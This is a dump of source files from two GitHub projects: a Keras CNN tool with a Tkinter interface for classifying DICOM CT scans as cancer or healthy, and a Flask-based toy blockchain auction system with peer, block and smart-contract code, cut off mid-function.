UnboundLocalError:\n pass # So that there is no error when num_epochs has no value\n\n # More variables\n\n try:\n num_cancer_tr = len(os.listdir(cancer_train_dir_path))\n num_healthy_tr = len(os.listdir(healthy_train_dir_path))\n\n num_cancer_val = len(os.listdir(cancer_validate_dir_path))\n num_healthy_val = len(os.listdir(healthy_validate_dir_path))\n\n total_train = num_cancer_tr + num_healthy_tr\n total_val = num_cancer_val + num_healthy_val\n print(total_val)\n except NameError:\n messagebox.showerror(\"Error\", \"At least one of the selected directories is invalid.\") # If no directory is selected, or other error\n\n # Initializing the CNN\n classifier = Sequential()\n\n # Convolution\n classifier.add(Convolution2D(32, 3, 3, input_shape = (target_size, target_size, 3), activation = 'relu'))\n\n # Pooling\n classifier.add(MaxPooling2D(pool_size = (2, 2)))\n\n # Adding a second convolutional layer\n classifier.add(Convolution2D(32, 3, 3, activation = 'relu'))\n classifier.add(MaxPooling2D(pool_size = (2, 2)))\n\n # Flattening\n classifier.add(Flatten())\n\n # Full connection\n classifier.add(Dense(128, activation = 'relu'))\n classifier.add(Dense(1, activation = 'sigmoid'))\n\n # Compile the CNN\n classifier.compile(optimizer = 'adam', loss = 'binary_crossentropy', metrics = ['accuracy'])\n\n # Fit the CNN to the images\n train_datagen = ImageDataGenerator(rescale = 1./255,\n shear_range = 0.2,\n zoom_range = 0.2,\n horizontal_flip = True)\n\n test_datagen 
= ImageDataGenerator(rescale = 1./255)\n\n try:\n training_set = train_datagen.flow_from_directory(os.path.abspath(os.path.join(cancer_train_dir_path, os.pardir)), # Get training parent directory\n target_size = (target_size, target_size),\n batch_size = total_train // 1000,\n class_mode = 'binary')\n\n validation_set = test_datagen.flow_from_directory(os.path.abspath(os.path.join(cancer_validate_dir_path, os.pardir)), # Get validation parent directory\n target_size = (target_size, target_size),\n batch_size = total_val // 1000,\n class_mode = 'binary')\n \n history = classifier.fit_generator(training_set,\n steps_per_epoch = total_train // 500,\n epochs = num_epochs,\n validation_data = validation_set,\n validation_steps = total_val // 500)\n\n # Visualize training results\n acc = history.history['acc']\n val_acc = history.history['val_acc']\n\n loss = history.history['loss']\n val_loss = history.history['val_loss']\n\n epochs_range = range(num_epochs)\n\n plt.figure(figsize=(8, 8))\n plt.subplot(1, 2, 1)\n plt.plot(epochs_range, acc, label='Training Accuracy')\n plt.plot(epochs_range, val_acc, label='Validation Accuracy')\n plt.legend(loc='lower right')\n plt.title('Training and Validation Accuracy')\n\n plt.subplot(1, 2, 2)\n plt.plot(epochs_range, loss, label='Training Loss')\n plt.plot(epochs_range, val_loss, label='Validation Loss')\n plt.legend(loc='upper right')\n plt.title('Training and Validation Loss')\n plt.show(block=False)\n\n # Save the trained model\n classifier.save('generated_model.h5')\n print()\n print(\"Trained model saved.\")\n # Set model to true\n global is_model\n is_model = True\n # Check status of model exist\n check_model_status()\n # Declare that the program should use the generated model\n global model_from_upload\n model_from_upload = False\n\n except ZeroDivisionError: # In final build, remove FileNotFoundError to except all\n pass # In case directory is not found\n\n Button(train_window, text=\"Create Model\", command=create_model).grid(row=5)\n\n # Directions for directory setup\n Label(train_window, text=\"Individual directories should be one level below total train/validate directories.\").grid(row=0, column=2)\n\n# Menu\nmenubar = Menu(main)\n\n# create a pulldown menu, and add it to the menu bar\nfilemenu = Menu(menubar, tearoff=0)\nfilemenu.add_command(label=\"Select Image\", command=upload_image) # Uploads the image\nmenubar.add_cascade(label=\"File\", menu=filemenu)\n\n# Training menu\ntrain_menu = Menu(menubar, tearoff=0)\ntrain_menu.add_command(label=\"Import Trained Model\", command=upload_model)\ntrain_menu.add_command(label=\"Train a Model\", command=create_train_window)\nmenubar.add_cascade(label=\"Train Model\", menu=train_menu)\n\n# Display the menu\nmain.config(menu=menubar)\n\n# Display image and model\ncheck_image_status() # Update status of image upload\ncheck_model_status() # Update status of model upload\n\nimage_label = Label(main, textvariable = image_status_text)\nmodel_label = Label(main, textvariable = model_status_text)\n\n# Display result\nblank = Entry(main)\n\n# Button to run the program\nrun_button = Button(main, text='Classify', command=display_result)\n\n# Positioning of elements in main window\nimage_label.grid(row=0)\nmodel_label.grid(row=1)\nrun_button.grid(row=2)\nblank.grid(row=2, column=1)\n\nmain.mainloop()\n\n# Delete the created .png image\nos.remove(import_image_filename + \".png\")" }, { "alpha_fraction": 0.7458351254463196, "alphanum_fraction": 0.7513883113861084, "avg_line_length": 21.7281551361084, "blob_id": 
"cd25ad518930b8ec8df15ccffb99f557120c5c15", "content_id": "9d4a58e931a85612a07fc6c09da40c78f8a58abb", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2341, "license_type": "permissive", "max_line_length": 421, "num_lines": 103, "path": "/README.md", "repo_name": "badalraina31/DeepCT", "src_encoding": "UTF-8", "text": "# DeepCT\n\nUsing Python to classify DICOM computerized tomography images. Uses the TensorFlow framework.\nClick [here](https://donnellyinitiative.org) to view this project's website.\nTo install dependencies, make sure that [pip](https://pip.pypa.io/en/stable/installing/) is running on your system.\n\n# Table of Contents\n\n* [License](#license)\n* [Dependencies](#dependencies)\n\n<a name=\"license\"/>\n\n# License\n\nBy using this software, you agree to the terms and conditions outlined in the [License](https://github.com/aidanelm/donnellyinitiative/blob/master/LICENSE). This results generated by this software should not be taken as medical advice and should not be a substitute for seeing a medical professional. Furthermore, the outputs of this software should not be considered conclusive unless verified by a medical professional.\n\n\n<a name=\"dependencies\"/>\n\n# Dependencies\n\n## TensorFlow\n\nGoogle's open-source machine learning library. DeepCT uses the TensorFlow framework.\n\nFor the software to be converted to an executable file, some newer versions are not compatible. The latest version tested with DeepCT is version 1.10, which is incompatible with Python versions 3.7 and newer.\n\nNote: The GPU version of TensorFlow has not been used with this software.\n\n```\npip install tensorflow==1.10\n```\nTo check if TensorFlow is running on your system, run:\n\n```python\nimport tensorflow as tf\nprint(tf.__version__)\n```\nIf installed correctly, it should output version 1.10.\n\n## Matplotlib\n\nUsed to plot the data, visually display the data, and create .png images.\n\n```\npip install matplotlib\n```\n\n## PyDICOM\n\nUsed to convert the DICOM images into .png format.\n\n```\npip install pydicom\n```\n\n## SciPy\n\nA fundamental library for machine learning.\n\n```\npip install scipy\n```\n\n## NumPy\n\nThe foundation for Tensorflow and SciPy. Installed with TensorFlow and SciPy by default.\n\n```\npip install numpy\n```\n\nTo check if NumPy is running on your system, run:\n\n```python\nimport numpy as np\nprint(np.__version__)\n```\n\n## Pillow\n\nUsed to work with the created .png images (originally in .dcm format).\n\n```\npip install pillow\n```\n\n## H5py\n\nInstalled with TensorFlow by default. 
Used to save and load existing ML models.\n\n```\npip install h5py\n```\n\n## Pyinstaller\n\nUsed to convert the .py file(s) into an executable file (Windows).\n\n```\npip install pyinstaller\n```\n" }, { "alpha_fraction": 0.6494807004928589, "alphanum_fraction": 0.6632047295570374, "avg_line_length": 24.443395614624023, "blob_id": "3dca8e06c710acee18197cee6dd25c7b701a6812", "content_id": "748fa272a14d2c9f1f337fbb9775ed3f9cde97ca", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2696, "license_type": "permissive", "max_line_length": 102, "num_lines": 106, "path": "/test.py", "repo_name": "badalraina31/DeepCT", "src_encoding": "UTF-8", "text": "# Tkinter import\nfrom tkinter import *\nfrom tkinter import filedialog # Needed for Pyinstaller to work\n\n# Helper libraries\nimport pydicom\nfrom scipy import ndimage\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport sys\nimport glob\nimport os\n\n# Window\nmain = Tk()\nmain.title('DeepCT')\n\n# Change the directory\ndef select_directory():\n path = filedialog.askdirectory()\n os.chdir(path)\n\n# Display the model\ndef show_scan():\n\n # load the DICOM files\n files = []\n\n for fname in glob.glob(\"*.dcm\", recursive=False):\n files.append(pydicom.dcmread(fname))\n\n # Skip files without a SliceLocation (Scout Views)\n slices = []\n for f in files:\n if hasattr(f, 'SliceLocation'):\n slices.append(f)\n else:\n continue\n\n # Order files correctly\n slices = sorted(slices, key=lambda s: s.SliceLocation)\n\n # pixel aspects, assuming all slices are the same\n ps = slices[0].PixelSpacing\n ss = slices[0].SliceThickness\n ax_aspect = ps[1]/ps[0]\n sag_aspect = ps[1]/ss\n cor_aspect = ss/ps[0]\n\n # create 3D array\n img_shape = list(slices[0].pixel_array.shape)\n img_shape.append(len(slices))\n img3d = np.zeros(img_shape)\n\n # fill 3D array with the images from the files\n for i, s in enumerate(slices):\n img2d = s.pixel_array\n img3d[:, :, i] = img2d\n\n # Plot axial slice\n axial = plt.subplot(2, 2, 1)\n axial.set_title(\"Axial\")\n plt.imshow(img3d[:, :, img_shape[2]//2])\n axial.set_aspect(ax_aspect)\n plt.set_cmap(\"bone\")\n \n # Plot sagittal slice\n sagittal = plt.subplot(2, 2, 2)\n sagittal.set_title(\"Sagittal\")\n\n # Rotate the image correctly (by 90 degrees)\n sag_original = img3d[:, img_shape[1]//2, :]\n sag_rotated = ndimage.rotate(sag_original, 90)\n plt.imshow(sag_rotated)\n sagittal.set_aspect(sag_aspect)\n plt.set_cmap(\"bone\")\n\n # Plot coronal slice\n coronal = plt.subplot(2, 2, 3)\n coronal.set_title(\"Coronal\")\n plt.imshow(img3d[img_shape[0]//2, :, :].T, origin=\"lower\") # Aligns the scan correctly\n coronal.set_aspect(cor_aspect)\n plt.set_cmap(\"bone\")\n\n # Ensure no overlap\n plt.tight_layout()\n\n plt.show()\n\n# Menu\nmenubar = Menu(main)\n\n# create a pulldown menu, and add it to the menu bar\nfilemenu = Menu(menubar, tearoff=0)\nfilemenu.add_command(label=\"Select Directory\", command=select_directory) # Selects the DICOM directory\nmenubar.add_cascade(label=\"File\", menu=filemenu)\n\n# Model menu\nmodel_menu = Menu(menubar, tearoff=0)\nmodel_menu.add_command(label=\"Display the Scan\", command=show_scan)\nmenubar.add_cascade(label=\"Train Model\", menu=model_menu)\n\n# Display the menu\nmain.config(menu=menubar)\n\nmain.mainloop()" }, { "alpha_fraction": 0.6317718029022217, "alphanum_fraction": 0.6506150364875793, "avg_line_length": 32.81415939331055, "blob_id": "46a651a02af977c25b0028455f6a1b4e4e515909", "content_id": 
"a77ffa8040cd4fcf136f075036085a92bddbe672", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3821, "license_type": "permissive", "max_line_length": 107, "num_lines": 113, "path": "/train.py", "repo_name": "badalraina31/DeepCT", "src_encoding": "UTF-8", "text": "# Keras imports\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Convolution2D\nfrom tensorflow.keras.layers import MaxPooling2D\nfrom tensorflow.keras.layers import Flatten\nfrom tensorflow.keras.layers import Dense\n\n# Other imports\nimport matplotlib.pyplot as plt\nimport os\n\n# Locations of datasets\ncwd = os.getcwd()\nPATH = cwd+'\\dataset'\n\ntrain_dir = os.path.join(PATH, 'train')\nvalidation_dir = os.path.join(PATH, 'validation')\n\ntrain_cancer_dir = os.path.join(train_dir, 'cancer_png')\ntrain_healthy_dir = os.path.join(train_dir, 'healthy_png')\nvalidation_cancer_dir = os.path.join(validation_dir, 'cancer_png')\nvalidation_healthy_dir = os.path.join(validation_dir, 'healthy_png')\n\n# Variables\nnum_epochs = 2\ntarget_size = 150\n\nnum_cancer_tr = len(os.listdir(train_cancer_dir))\nnum_healthy_tr = len(os.listdir(train_healthy_dir))\n\nnum_cancer_val = len(os.listdir(validation_cancer_dir))\nnum_healthy_val = len(os.listdir(validation_healthy_dir))\n\ntotal_train = num_cancer_tr + num_healthy_tr\ntotal_val = num_cancer_val + num_healthy_val\n\n# Initialising the CNN\nclassifier = Sequential()\n\n# Convolution\nclassifier.add(Convolution2D(32, 3, 3, input_shape = (target_size, target_size, 3), activation = 'relu'))\n\n# Pooling\nclassifier.add(MaxPooling2D(pool_size = (2, 2)))\n\n# Adding a second convolutional layer\nclassifier.add(Convolution2D(32, 3, 3, activation = 'relu'))\nclassifier.add(MaxPooling2D(pool_size = (2, 2)))\n\n# Flattening\nclassifier.add(Flatten())\n\n# Full connection\nclassifier.add(Dense(128, activation = 'relu'))\nclassifier.add(Dense(1, activation = 'sigmoid'))\n\n# Compile the CNN\nclassifier.compile(optimizer = 'adam', loss = 'binary_crossentropy', metrics = ['accuracy'])\n\n# Fit the CNN to the images\n\nfrom tensorflow.keras.preprocessing.image import ImageDataGenerator\n\ntrain_datagen = ImageDataGenerator(rescale = 1./255,\n shear_range = 0.2,\n zoom_range = 0.2,\n horizontal_flip = True)\n\ntest_datagen = ImageDataGenerator(rescale = 1./255)\n\ntraining_set = train_datagen.flow_from_directory(train_dir,\n target_size = (target_size, target_size),\n batch_size = total_train // 1000,\n class_mode = 'binary')\n\nvalidation_set = test_datagen.flow_from_directory(validation_dir,\n target_size = (target_size, target_size),\n batch_size = total_val // 1000, # Change to 1000 in final build\n class_mode = 'binary')\n\nhistory = classifier.fit_generator(training_set,\n steps_per_epoch = total_train // 500, # Change to 500 in final build\n epochs = num_epochs,\n validation_data = validation_set,\n validation_steps = total_val // 500) # Change to 500 in final build\n\n# Visualize training results\nacc = history.history['acc']\nval_acc = history.history['val_acc']\n\nloss = history.history['loss']\nval_loss = history.history['val_loss']\n\nepochs_range = range(num_epochs)\n\nplt.figure(figsize=(8, 8))\nplt.subplot(1, 2, 1)\nplt.plot(epochs_range, acc, label='Training Accuracy')\nplt.plot(epochs_range, val_acc, label='Validation Accuracy')\nplt.legend(loc='lower right')\nplt.title('Training and Validation Accuracy')\n\nplt.subplot(1, 2, 2)\nplt.plot(epochs_range, loss, label='Training 
Loss')\nplt.plot(epochs_range, val_loss, label='Validation Loss')\nplt.legend(loc='upper right')\nplt.title('Training and Validation Loss')\nplt.show()\n\n# Save the trained model\nclassifier.save('test_model.h5')\nprint()\nprint(\"Trained model saved.\")\n" }, { "alpha_fraction": 0.719836413860321, "alphanum_fraction": 0.7280163764953613, "avg_line_length": 34, "blob_id": "812af7cf6766f3bc5ece1df8a086f54968b54625", "content_id": "b312fb3f8441e068434621933e511c87f4d70644", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 489, "license_type": "permissive", "max_line_length": 132, "num_lines": 14, "path": "/DICOM_to_png.py", "repo_name": "badalraina31/DeepCT", "src_encoding": "UTF-8", "text": "import pydicom\nimport matplotlib.pyplot as plt\nimport os\n\ndirectory_in_str = \"dataset/validation/cancer\"\n\ndirectory = os.fsencode(directory_in_str)\n\nfor file in os.listdir(directory):\n filename = os.fsdecode(file)\n filename_plus_dir = directory_in_str + \"/\" + filename\n print(filename_plus_dir)\n ImageFile = pydicom.read_file(filename_plus_dir)\n plt.imsave(str(\"dataset/validation/cancer_png/\" + filename + \".png\"), ImageFile.pixel_array, cmap=plt.cm.gray, vmin=1, vmax=250)" } ]
5
tranvien98/blockchain
https://github.com/tranvien98/blockchain
177c42d14e98d16adda31e224f64c8b23b1ba27c
975be87444a889b3cdc60e5323c8db3619e39320
cc7946a54631505c507fbc1ae7ea1902a639c552
refs/heads/master
2020-05-21T21:26:30.866431
2019-05-23T04:14:08
2019-05-23T04:14:08
186,154,098
2
0
null
null
null
null
null
[ { "alpha_fraction": 0.536697268486023, "alphanum_fraction": 0.5405198931694031, "avg_line_length": 27.434782028198242, "blob_id": "bb231d884e6a4e88dc8902021fc7678009737917", "content_id": "45b9d682625deee45374740295ea749b982f199e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1308, "license_type": "no_license", "max_line_length": 76, "num_lines": 46, "path": "/app/smart.py", "repo_name": "tranvien98/blockchain", "src_encoding": "UTF-8", "text": "import threading\nimport time\nfrom threading import Timer\nimport sys\nimport requests\n\n\ndef run(times, author, id_auctioneer, CONNECTED_NODE_ADDRESS):\n def close_auction(author, id_auctioneer, CONNECTED_NODE_ADDRESS):\n\n post_object = {\n 'type': 'close',\n 'content': {\n 'id_auctioneer': id_auctioneer,\n 'author': author,\n 'timestamp': time.time()\n }\n }\n\n new_tx_address = \"{}/new_transaction\".format(CONNECTED_NODE_ADDRESS)\n\n requests.post(new_tx_address,\n json=post_object,\n headers={'Content-type': 'application/json'})\n\n print(author, id_auctioneer, CONNECTED_NODE_ADDRESS)\n\n def mine():\n # dao block moi de luu tru thong tin\n url = '{}/mine'.format(CONNECTED_NODE_ADDRESS)\n response = requests.get(url)\n\n data = response.json()['response']\n print(data)\n\n start = time.perf_counter()\n while True:\n if times() and time.perf_counter()-start > 60:\n t = Timer(0, close_auction, args=[\n author, id_auctioneer, CONNECTED_NODE_ADDRESS])\n t.start()\n f = Timer(0.6, mine)\n f.start()\n break\n if not times():\n break\n" }, { "alpha_fraction": 0.5568587183952332, "alphanum_fraction": 0.565017819404602, "avg_line_length": 25.863014221191406, "blob_id": "9a42458ab7ad00044b0823dcf6d76a8d56ce4994", "content_id": "74131f1fb07ca20dc4e99a2a14d0fcc0302bacc4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5912, "license_type": "no_license", "max_line_length": 81, "num_lines": 219, "path": "/app/views.py", "repo_name": "tranvien98/blockchain", "src_encoding": "UTF-8", "text": "import datetime\nimport json\nimport os\nimport requests\nfrom flask import Flask\nfrom flask import render_template, redirect, request, jsonify\nimport time\nimport string\nimport codecs\n__location__ = os.path.realpath(os.path.join(\n os.getcwd(), os.path.dirname(__file__)))\n\napp = Flask(__name__)\n\n\n# The node with which our application interacts, there can be multiple\n# such nodes as well.\n\n\nposts = []\n\n\ndef fetch_posts():\n \"\"\"\n lấy chuỗi từ peer và phân tích dữ liệu\n \"\"\"\n get_chain_address = \"{}/open_auctions\".format(CONNECTED_NODE_ADDRESS)\n \n response = requests.get(get_chain_address)\n print(response)\n if response.status_code == 200:\n content = []\n data = json.loads(response.content)\n auctions = data['auctions']\n print(data)\n\n global posts\n posts = sorted(auctions, key=lambda k: k['timestamp'],\n reverse=True)\n \n\n\[email protected]('/')\ndef index():\n fetch_posts()\n return render_template('index.html',\n title='Auction system based on blockchain technology',\n posts=posts,\n node_address=CONNECTED_NODE_ADDRESS,\n readable_time=timestamp_to_string)\n\n\[email protected]('/mine', methods=['GET', 'POST'])\ndef mine():\n# dao block moi de luu tru thong tin\n url = '{}/mine'.format(CONNECTED_NODE_ADDRESS)\n response = requests.get(url)\n\n data = response.json()['response']\n print(data)\n return data\n\[email protected]('/submit', methods=['POST'])\ndef submit_textarea():\n \"\"\"\n tạo giao dịch mới khi ấn 
post\n \"\"\"\n id_auctioneer = int(request.form['id_auctioneer'])\n item = request.form['item']\n auctioneer = request.form['auctioneer']\n author = request.remote_addr\n starting_price = float(request.form['starting_price'])\n post_object = {\n 'type': 'open',\n 'content': {\n 'id_auctioneer': id_auctioneer,\n 'item': item,\n 'auctioneer': auctioneer,\n 'author': author + ':5000',\n 'price_bidder': starting_price,\n 'status': 'opening',\n 'timestamp': time.time(),\n 'contract': 'run',\n 'connect': CONNECTED_NODE_ADDRESS\n }\n }\n\n new_tx_address = \"{}/new_transaction\".format(CONNECTED_NODE_ADDRESS)\n\n\n requests.post(new_tx_address,\n json=post_object,\n headers={'Content-type': 'application/json'})\n\n return redirect('/')\n\n\[email protected]('/close_auction', methods=['GET', 'POST'])\ndef close_auction():\n \"\"\"\n đóng cuộc đấu giá\n \"\"\"\n\n author = request.remote_addr\n id_auctioneer = int(request.args.get('id_auctioneer'))\n\n post_object = {\n 'type': 'close',\n 'content': {\n 'id_auctioneer' : id_auctioneer,\n 'author': author + ':5000',\n 'timestamp': time.time()\n }\n }\n\n new_tx_address = \"{}/new_transaction\".format(CONNECTED_NODE_ADDRESS)\n\n requests.post(new_tx_address,\n json=post_object,\n headers={'Content-type': 'application/json'})\n\n return redirect('/')\n\n\[email protected]('/auctioning', methods=['GET', 'POST'])\ndef auctioning():\n \"\"\"\n tao giao dich khi nguoi dau gia an nut send \n \"\"\"\n\n author = request.remote_addr\n id_auctioneer = int(request.form['id_auctioneer'])\n price_bidder = float(request.form['price_bidder'])\n\n post_object = {\n 'type': 'auctioning',\n 'content': {\n 'id_auctioneer' : id_auctioneer,\n 'id_bidder': author + ':5000',\n 'price_bidder' : price_bidder,\n 'author': author + ':5000',\n 'timestamp': time.time()\n }\n }\n\n\n new_tx_address = \"{}/new_transaction\".format(CONNECTED_NODE_ADDRESS)\n\n requests.post(new_tx_address,\n json=post_object,\n headers={'Content-type': 'application/json'})\n contract_object = {\n 'type': 'execute',\n 'content': {\n 'contract': 'run',\n 'author': author+ ':5000',\n 'id_auctioneer': id_auctioneer,\n 'connect': CONNECTED_NODE_ADDRESS\n }\n }\n\n requests.post(new_tx_address,\n json=contract_object,\n headers={'Content-type': 'application/json'})\n return redirect('/')\n\[email protected]('/pending_tx', methods=['GET', 'POST'])\ndef get_pending_tx():\n\n url = '{}/pending_tx'.format(CONNECTED_NODE_ADDRESS)\n response = requests.get(url)\n data = response.json()\n return jsonify(data)\n\n\[email protected]('/update_chaincode', methods=['GET', 'POST'])\ndef update_chaincode():\n file = os.path.join(__location__, 'smart.py')\n code = ''\n\n with codecs.open(file, encoding='utf8', mode='r') as inp:\n code = inp.read()\n\n author = request.remote_addr\n\n post_object = {\n 'type': 'smartcontract',\n 'content': {\n 'code': code,\n 'author': author + ':5000',\n 'timestamp': time.time()\n }\n }\n\n new_tx_address = \"{}/new_transaction\".format(CONNECTED_NODE_ADDRESS)\n\n requests.post(new_tx_address,\n json=post_object,\n headers={'Content-type': 'application/json'})\n\n return redirect('/')\ndef timestamp_to_string(epoch_time):\n return datetime.datetime.fromtimestamp(epoch_time).strftime('%H:%M')\n\n\nif __name__ == '__main__':\n from argparse import ArgumentParser\n\n parser = ArgumentParser()\n parser.add_argument('-p', '--port', default=8080,\n type=int, help='port to listen on')\n parser.add_argument('--host', default='127.0.0.1',\n type=str, help='port to listen on')\n args = 
parser.parse_args()\n port = args.port\n\n CONNECTED_NODE_ADDRESS = 'http://{}:5000'.format(args.host)\n\n app.run(host='127.0.0.1', port=port, debug=True, threaded=True)\n" },
{ "alpha_fraction": 0.6338862776756287, "alphanum_fraction": 0.6374407410621643, "avg_line_length": 32.7599983215332, "blob_id": "b3e9777d701c0fb0283bc0b4204e9183e20e3297", "content_id": "ed1e3b7f2e451d717bfdff75ad8ef82b8e4b9ca7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 844, "license_type": "no_license", "max_line_length": 99, "num_lines": 25, "path": "/block_server/block.py", "repo_name": "tranvien98/blockchain", "src_encoding": "UTF-8", "text": "import hashlib\nimport time\nimport json\n\nclass Block(object):\n def __init__(self, index, previous_hash, nonce, difficult, transactions, timestamp=None):\n self.index = index\n self.previous_hash = previous_hash\n self.nonce = nonce\n self.difficult = difficult\n self.transactions = transactions\n self.timestamp = timestamp or time.time()\n\n def compute_hash(self):\n\n block_string = json.dumps(self.__dict__, sort_keys=True)\n\n return hashlib.sha256(block_string.encode()).hexdigest()\n\n @staticmethod\n def from_dict(data_block):\n block = Block(data_block['index'], data_block['previous_hash'], data_block['nonce'], \n data_block['difficult'], data_block['transactions'], data_block['timestamp'])\n block.hash = data_block['hash']\n return block\n" },
{ "alpha_fraction": 0.6113213896751404, "alphanum_fraction": 0.6222378611564636, "avg_line_length": 31.36182403564453, "blob_id": "f8a1550b4aee70a92d3013b104cfa3ed0292e755", "content_id": "055319ec97f8dcbf1dadcd29ebf852ff2e5f0559", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 11411, "license_type": "no_license", "max_line_length": 210, "num_lines": 351, "path": "/block_server/genneral_peer.py", "repo_name": "tranvien98/blockchain", "src_encoding": "UTF-8", "text": "\"\"\"\nTransaction-related services still to be implemented:\n- Define transactions\n- Validate\n- Process\n- Query data from the blockchain\n- Define chain-code (smart contracts)\n\"\"\"\nimport sys\nimport time\nimport requests\nfrom flask import Flask, jsonify, request\nimport threading\nfrom block import Block\nfrom blockchain import Blockchain\n\napp = Flask(__name__)\nanchors = set() # <ip>:<port>\nanchors.add('127.0.0.1:5001')\norders = set()\norders.add('127.0.0.1:5002')\nblockchain = Blockchain()\n\norderIp = \"127.0.0.1:5002\"\nanchorsIp = \"127.0.0.1:5001\"\nmyAddress = \"127.0.0.1:5000\"\n\[email protected]('/new_transaction', methods=['POST'])\ndef new_transaction():\n \"\"\"\n Add a new transaction\n \"\"\"\n tx_data = request.get_json()\n\n required_fields = [\"type\", \"content\"]\n\n for field in required_fields:\n if not tx_data.get(field):\n return \"Invalid transaction data\", 404\n\n tx_data[\"timestamp\"] = time.time()\n\n blockchain.add_new_transaction(tx_data)\n\n url = 'http://{}/broadcast_transaction'.format(orderIp)\n response = requests.post(url, json=tx_data)\n \n return \"Success\", 201\n\n\[email protected]('/get_transaction', methods=['POST'])\ndef get_transaction():\n \"\"\"\n Receive a transaction from another node\n \"\"\"\n \n tx_data = request.get_json()\n required_fields = [\"type\", \"content\", \"timestamp\"]\n\n for field in required_fields:\n if not tx_data.get(field):\n return \"Invalid transaction data\", 404\n\n blockchain.add_new_transaction(tx_data)\n\n return \"Success\", 201\n\n\n\"\"\"\nGet the last block of the chain\n\"\"\"
@app.route('/open_auctions', methods=['GET'])\ndef get_open_auctions():\n \n global blockchain\n\n url = 'http://{}/consensus'.format(orderIp)\n response = requests.get(url)\n length = response.json()['length']\n chain = response.json()['chain']\n longest_chain = Blockchain.from_list(chain)\n\n print(len(blockchain.chain), length)\n if len(blockchain.chain) < length and blockchain.check_chain_validity(longest_chain.chain):\n longest_chain.open_auctions = {}\n\n for block in longest_chain.chain:\n if not compute_open_auctions(block, longest_chain.open_auctions, longest_chain.chain_code):\n return \"Invalid Blockchain\", 400\n\n blockchain = longest_chain\n\n auctions = []\n for _ , auction in blockchain.open_auctions.items():\n auctions.append(auction)\n return jsonify({\"length\": len(blockchain.open_auctions),\n \"auctions\": list(auctions)})\n\n\[email protected]('/chain', methods=['GET'])\ndef get_chain():\n global blockchain\n\n url = 'http://{}/consensus'.format(orderIp)\n response = requests.get(url)\n\n length = response.json()['length']\n chain = response.json()['chain']\n longest_chain = Blockchain.from_list(chain)\n\n if len(blockchain.chain) < length and blockchain.check_chain_validity(longest_chain.chain):\n # Re-check open_auctions\n longest_chain.open_auctions = {}\n\n for block in longest_chain.chain:\n if not compute_open_auctions(block, longest_chain.open_auctions, longest_chain.chain_code):\n return \"Invalid Blockchain\", 400\n\n blockchain = longest_chain\n\n chain_data = []\n for block in blockchain.chain:\n chain_data.append(block.__dict__)\n return jsonify({\"length\": len(chain_data),\n \"chain\": chain_data})\n\n\[email protected]('/local_chain', methods=['GET'])\ndef get_local_chain():\n chain_data = []\n\n for block in blockchain.chain:\n chain_data.append(block.__dict__)\n\n return jsonify({\"length\": len(chain_data),\n \"chain\": chain_data})\n\[email protected]('/mine', methods=['GET'])\ndef mine():\n \"\"\"\n \n \"\"\"\n if not blockchain.unconfirmed_transactions:\n return jsonify({\"response\": \"None transactions 0x01\"})\n\n last_block = blockchain.last_block\n\n new_block = Block(last_block.index + 1, last_block.hash, 0, blockchain.difficulty, [])\n\n \n for transaction in blockchain.unconfirmed_transactions:\n if not validate_transaction(transaction):\n continue\n new_block.transactions.append(transaction)\n\n\n blockchain.unconfirmed_transactions = []\n\n if (len(new_block.transactions) == 0):\n return jsonify({\"response\": \"Error none transactions x02\"})\n\n proof = blockchain.proof_of_work(new_block)\n blockchain.add_block(new_block, proof)\n\n\n url = 'http://{}/broadcast_block'.format(orderIp)\n response = requests.post(url, json=new_block.__dict__)\n\n result = new_block.index\n\n if not result:\n return jsonify({\"response\": \" Error none transactions x02\"})\n return jsonify({\"response\": \"Block #{} is mined.\".format(result)})\n\n\n\[email protected]('/add_block', methods=['POST'])\ndef validate_and_add_block():\n global blockchain\n\n data_block = request.get_json()\n\n block = Block(data_block['index'], data_block['previous_hash'], data_block['nonce'],\n data_block['difficult'], data_block['transactions'], data_block['timestamp'])\n\n tmp_open_auctions = blockchain.open_auctions\n tmp_chain_code = blockchain.chain_code\n\n if not compute_open_auctions(block, tmp_open_auctions, tmp_chain_code):\n return \"The block was discarded by the node\", 400\n\n blockchain.open_auctions = tmp_open_auctions\n 
blockchain.chain_code = tmp_chain_code\n\n proof = data_block['hash']\n added = blockchain.add_block(block, proof)\n\n if not added:\n return \"The block was discarded by the node\", 400\n\n return \"Block added to the chain\", 201\n\n\[email protected]('/pending_tx')\ndef get_pending_tx():\n return jsonify(blockchain.unconfirmed_transactions)\n\n\[email protected]('/list_nodes', methods=['GET', 'POST'])\ndef list_node():\n url = 'http://{}/list_nodes'.format(orderIp)\n response = requests.get(url)\n\n data = response.json()\n\n return jsonify(data)\n\n\ndef validate_transaction(transaction):\n global blockchain\n # Check the transaction author's permissions\n author = transaction['content']['author']\n print(author)\n url = 'http://{}/validate_permission'.format(anchorsIp)\n response = requests.post(\n url, json={'peer': author, 'action': transaction['type']})\n\n if response.json()['decision'] != 'accept':\n print(\"Reject from server\")\n return False\n\n if transaction['type'].lower() == 'open':\n id_auctioneer = transaction['content']['id_auctioneer']\n if id_auctioneer in blockchain.open_auctions:\n return False\n if transaction['content']['price_bidder'] < 0:\n return False\n blockchain.open_auctions[id_auctioneer] = transaction['content']\n blockchain.timeout[id_auctioneer] = True\n try:\n thread = threading.Thread(target=blockchain.chain_code[transaction['content']['contract']], args=(\n lambda: blockchain.timeout[id_auctioneer], transaction['content']['author'], transaction['content']['id_auctioneer'], transaction['content']['connect'], ))\n thread.start()\n except :\n print('Error contract x02')\n return True\n elif transaction['type'].lower() == 'auctioning':\n id_auctioneer = transaction['content']['id_auctioneer']\n if transaction['content']['price_bidder'] < 0:\n return False\n if id_auctioneer in blockchain.open_auctions and blockchain.open_auctions[id_auctioneer]['status'] == 'opening':\n price_bidder = 